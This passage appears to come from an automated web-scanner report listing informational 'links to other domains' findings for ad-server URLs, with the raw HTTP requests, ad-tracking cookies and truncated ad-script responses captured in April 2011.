Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:39:57 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1701

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=KFyPwvUoDkApXI_C9SgOQAAAAMDMzARAKVyPwvUoDkApXI_C9SgOQMhZn8QGScMa8f5MdWfsOnidU6BNAAAAAEchAAC1AAAANQEAAAIAAADbfgQA0WMAAAEAAABVU0QAVVNEACwB-gAwC1UA4gUBAgUCAAQAAAAATSLwCgAAAAA.&tt_code=vert-16&udj=uf%28%27a%27%2C+537%2C+1302352797%29%3Buf%28%27c%27%2C+5740%2C+1302352797%29%3Buf%28%27r%27%2C+294619%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..&referrer=http://www.wcax.com/Global/category.asp&pp=TaBTnQAErxsK5XIEsatUZyS2vMMbWLuZP7exLA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6bkQnVOgTZveEoTklQfnqK2NC-_675oCp439xBqP_I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzsgEMd3d3LndjYXguY29tugEKMzAweDI1MF9hc8gBCdoBL2h0dHA6Ly93d3cud2NheC5jb20vR2xvYmFsL2NhdGVnb3J5LmFzcD9DPTE4ODM2mALoG8ACBMgCq4KlDqgDAegDEOgD1CroA-cC9QMAAABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxndgaio4wOQ4d3JMhys8mZPCymmQ%26client%3Dca-pub-2103553853082603%26adurl%3D"></script>
...[SNIP]...
10.157. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-8682976704480862&output=html&h=90&slotname=3986512480&w=728&lmt=1302370256&flash=10.2.154&url=http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html&dt=1302352256731&bpp=1&shv=r20110330&jsv=r20110321-2&correlator=1302352256780&frm=0&adk=2177532278&ga_vid=1441694128.1302352179&ga_sid=1302352179&ga_hid=1539016947&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wptz.com%2Fnews%2Findex.html&fu=0&ifi=1&dtd=63&xpc=iCyYe66YTt&p=http%3A//www.wptz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:31:05 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12190

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.wptz.com/news/27483035/detail.html%26hl%3Den%26client%3Dca-pub-8682976704480862%26adU%3Dwww.ShopAtHome.com%26adT%3DFree%2BCoupons%26adU%3Dwww.VtCulinaryResort.com%26adT%3DThe%2BEssex%2BResort%2B%2526amp%253B%2BSpa%26adU%3Dwww.TripMama.com%26adT%3DCheap%2BFlights%2B-%2B65%2525%2BOff%26gl%3DUS&amp;usg=AFQjCNFsKfbWruHRMqYF-FmOKsqHAbPWZg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
10.158. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5597875046540809&output=html&h=60&slotname=4254550909&w=468&lmt=1302639818&flash=10.2.154&url=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fdirectory%2F%3Fa%3D1&dt=1302621818178&bpp=3&shv=r20110406&jsv=r20110406&correlator=1302621818190&frm=0&adk=3184245769&ga_vid=1489843502.1302621734&ga_sid=1302621734&ga_hid=776305434&ga_fc=1&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1079&bih=1038&ref=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fon-island.php&fu=0&ifi=1&dtd=27&xpc=si0H8efiVR&p=http%3A//www.mvtimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 12 Apr 2011 15:23:42 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4325

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.mvtimes.com/marthas-vineyard/directory/%253Fa%253D1%26hl%3Den%26client%3Dca-pub-5597875046540809%26adU%3Dwww.Groupon.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHx3IiJ5hEV6E3dETlZ-3hMiwhxYA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
10.159. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=6973263501&w=300&lmt=1302370451&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18197&dt=1302352451303&bpp=2&shv=r20110330&jsv=r20110321-2&correlator=1302352451347&frm=0&adk=3713764857&ga_vid=2033131009.1302352452&ga_sid=1302352452&ga_hid=753737825&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&eid=36813005&ref=http%3A%2F%2Fwww.wcax.com%2F&fu=0&ifi=1&dtd=384&xpc=9pTvkhsWFJ&p=http%3A//www.wcax.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:34:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1549

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.adroll.com/j/rolling.js"></script>
...[SNIP]...
10.160. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370796&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fstory.asp%3FS%3D465801&dt=1302352796416&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352796421&frm=0&adk=2815960337&ga_vid=54642498.1302352796&ga_sid=1302352796&ga_hid=1675332694&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&fu=0&ifi=1&dtd=8&xpc=3yUciFtoTL&p=http%3A//www.wcax.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:40:03 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4008

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.wcax.com/Global/story.asp%253FS%253D465801%26hl%3Den%26client%3Dca-pub-2103553853082603%26adU%3DNaviibk.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFIPJJYYDfeN4RXyy0A-FkPzNaUQQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
10.161. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ab?enc=ZWZmZmZmEUDv12SNeugPQAAAAAAAAAhA79dkjXroD0BmZmZmZmYRQJ4HxOaAPCZQ8f5MdWfsOnjVLKNNAAAAANBJAwBUAwAANQEAAAIAAACqJQIAmmYAAAEAAABVU0QAVVNEACwB-gCyE7YCSQwBAgUCAAIAAAAAAyGNjAAAAAA.&tt_code=62967&udj=uf%28%27a%27%2C+537%2C+1302539477%29%3Buf%28%27c%27%2C+5740%2C+1302539477%29%3Buf%28%27r%27%2C+140714%2C+1302539477%29%3Bppv%28783%2C+%275775370096474326942%27%2C+1302539477%2C+1302971477%2C+5740%2C+26266%29%3B&cnd=!JBXRQgjsLBCqywgYACCazQEotgUxZmZmZmZmEUBCEwgAEAAYACABKP7__________wFIAFAAWLInYABotQI.&referrer=http://www.foxnews.com/politics/index.html&pp=2.60 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIiXoQChgBIAEoATD_1IztBBD_1IztBBgA; acb816160=5_[r^208WM6[kCcE/qX3b13VQ?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zP6FOfHPNtdQt8f5MdWfsOnh_KqNNAAAAAMY5AwA3AQAAfAAAABkAAACfsAMAoVsAAAEAAABVU0QAVVNEACwB-gCqAQAA_gEBAgUCAAUAAAAAgyXJcAAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198711%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12085950884050564,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5778,%5C%22spendCreativeId%5C%22:198711,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd168.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12085950884050564%5EMEDIA6_DATA%5Efoo=bar; sess=1; uuid2=8663496762294337265; anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9!z6W0Jrx!wQ.y=fCzU_Fs2'gkKKA]$O/KPf+4#*[KxO?)Y+Ak9VRY_MNh'tM#U*cRYEl@2:-O`/[wF!*+([77te'#0GB_^*%p-G=(Y`j^:P![4#GOC0ScY4Jwaue1E-1EQ$(U65?I_<[c2-MxCu29ZR'!lUHN)-0<$VDu]IKM.kOO7].tJEH.9>4=0r(J`qtK'J

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:31:18 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:31:18 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:31:18 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6W0Jrx!wQ.y=fCzU_Fs2'gkKKA]$O/KPf+4#*[KxO?)Y+Ak9VRY_MNh'tM#U*cRYEl@2:-O`/[wF!*+([77te'#0GB_^*%p-G=(Y`j^:P![4#GOC0ScY4Jwaue1E-1EQ$(U65?I_<[c2-MxCu29ZR'!lUHN)-0<$VDu]IKM.kOO7].tJEH.9>4=13'iq:^cp/u%pqS!'zjghR!vJ; path=/; expires=Sun, 10-Jul-2011 16:31:18 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 11 Apr 2011 16:31:18 GMT
Content-Length: 5430

(function(){var flashAd='<OBJECT id="5775370096474326942" data="http://cdn.adnxs.com/p/a2/28/8f/c6/a2288fc65ffab6cf7a66ad8e31d4ea6e.swf" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="300
...[SNIP]...
</scr' + 'ipt>');}}    else {document.write(alternate);}})();document.write('<img src="http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1" width="1" height="1"/>');
10.162. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /if?enc=4XoUrkfh9j_hehSuR-H2PwAAAMDMzAhAexSuR-H6EUB7FK5H4foRQGyzTtWol9w48f5MdWfsOnh2bqRNAAAAABUbAAC1AAAANQEAAAIAAADXfgQA0WMAAAEAAABVU0QAVVNEACwB-gC1GHIAoA8BAgUCAAQAAAAAuibSxwAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DByl0zdm6kTf_uL83P6Aa8svGiCu_675oCp439xBrv8I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01NTk3ODc1MDQ2NTQwODA5sgEPd3d3Lm12dGltZXMuY29tugEKMzAweDI1MF9hc8gBCdoBNWh0dHA6Ly93d3cubXZ0aW1lcy5jb20vbWFydGhhcy12aW5leWFyZC9vbi1pc2xhbmQucGhwmAKWC8ACBMgCq4KlDqgDAegDsCroA7II9QMABABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtzEpohHrVWeJEJyiZUS6oseA0vyiQ%26client%3Dca-pub-5597875046540809%26adurl%3D&tt_code=&udj=uf%28%27a%27%2C+537%2C+1302621828%29%3Buf%28%27c%27%2C+5740%2C+1302621828%29%3Buf%28%27r%27%2C+294615%2C+1302621828%29%3Bppv%28783%2C+%274097316512389313388%27%2C+1302621828%2C+1303053828%2C+5740%2C+25553%29%3B&cnd=!aBajcAjsLBDX_REYACDRxwEocjFmZmY-4foRQEITCAAQABgAIAEo_v__________AUgAUABYtTFgAGi1Ag..&referrer=http://www.mvtimes.com/marthas-vineyard/on-island.php HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5597875046540809&output=html&h=250&slotname=6415844257&w=300&lmt=1302639810&flash=10.2.154&url=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fon-island.php&dt=1302621810909&bpp=2&shv=r20110406&jsv=r20110406&prev_slotnames=4254550909&correlator=1302621810900&frm=0&adk=3606988145&ga_vid=1489843502.1302621734&ga_sid=1302621734&ga_hid=282251794&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.mvtimes.com%2Farchives%2F&fu=0&ifi=2&dtd=7&xpc=CSZzOTbuz0&p=http%3A//www.mvtimes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIiXoQChgCIAIoAjC27IztBAoSCNyOARAKGAEgASgBMODnjO0EELbsjO0EGAI.; acb917920=5_[r^kI/7Z6[kCcE/qX3Ib3`j?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zP5U0V0-cDA0L8f5MdWfsOng2NqNNAAAAAMY5AwA3AQAAfAAAABkAAAChsAMAoVsAAAEAAABVU0QAVVNEANgCWgCqAQAANQIBAgUCAAUAAAAAWyI5nAAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198712%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12488354959403911,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5780,%5C%22spendCreativeId%5C%22:198712,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd146.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12488354959403911%5EMEDIA6_DATA%5Efoo=bar; anj=Kfu=8fG6kGfQCe7?0P(*AuB-u**g1:XIDg1#yJ3=qNXsr)=m!YD!I4Fb7]GM0N>*/6!c^k*WP?FYDMt2+(T:PL<CMg8kCUv+(TSbVDfRD_X=@-V9_7v47sx3(*/rO*J#$a!QZfrq8s0o[=6!-'Tc3_1V2(9#'3l3dVyFA>z4r91OiUmMOaU_TIIb<!8`>]D>a##TqO#rgJ$n1Q-[+C^BnlV`k?U#36J=A%V>U+S7yTlnBPsg(_b6[$c5>2BrW4XfFt?<ZfG6[JyynB$LInC[[wQ6[Gb?W; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 13-Apr-2011 15:23:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Mon, 11-Jul-2011 15:23:38 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Mon, 11-Jul-2011 15:23:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG10QfQCe7?0P(*AuB-u**g1:XICZh#yJ3=qNXsr)=m!YD!I4Fb7]GM0N>*/6!c^k*WP?FYDMt2+(T:PL<CMg8kCUv+(TSbVDfRD_X=@-V9_7v47sx3(*/rO*J#$a!QZfrq8s0o[=6!-'Tc3_1V2(9#'3l3dVyFA>z4r91OiUmMO`J3N@@1Sh)wcc5fprDTIIb<!%WU0dtX(%[?aeV37]0Z06j@Hc2D-AkOKp9MHP9_Aw>0)LjhrT'h>+EPko'#:c5ikrrCjq8qS^*8<HA-`CLdb8B_go@)>8DN7tW=; path=/; expires=Mon, 11-Jul-2011 15:23:38 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 12 Apr 2011 15:23:38 GMT
Content-Length: 1203

<iframe id="kwcWidgetFrame" name="kwcWidgetFrame" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" width="300" height="250" src="http://ib.adnxs.com/click/4XoUrkfh9j_hehSuR-H2PwAAAMDMzA
...[SNIP]...
</iframe><img src="http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/1AC1C520-232B-4E3D-B0CC-A52AC15EB7D4/User/8663496762294337265/gif?meta=appNexus" width="1" height="1"/>
10.163. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ptj?member=311&inv_code=cm.foxnews&size=728x90&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.foxnews%2Ftier2_031010%3Bnet%3Dcm%3Bu%3D%2Ccm-68330357_1302541877%2C11f3c48b4c0582b%2Cnone%2Cax.{PRICEBUCKET}%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D46894%3Bcontx%3Dnone%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D1302541877%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302541875197&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
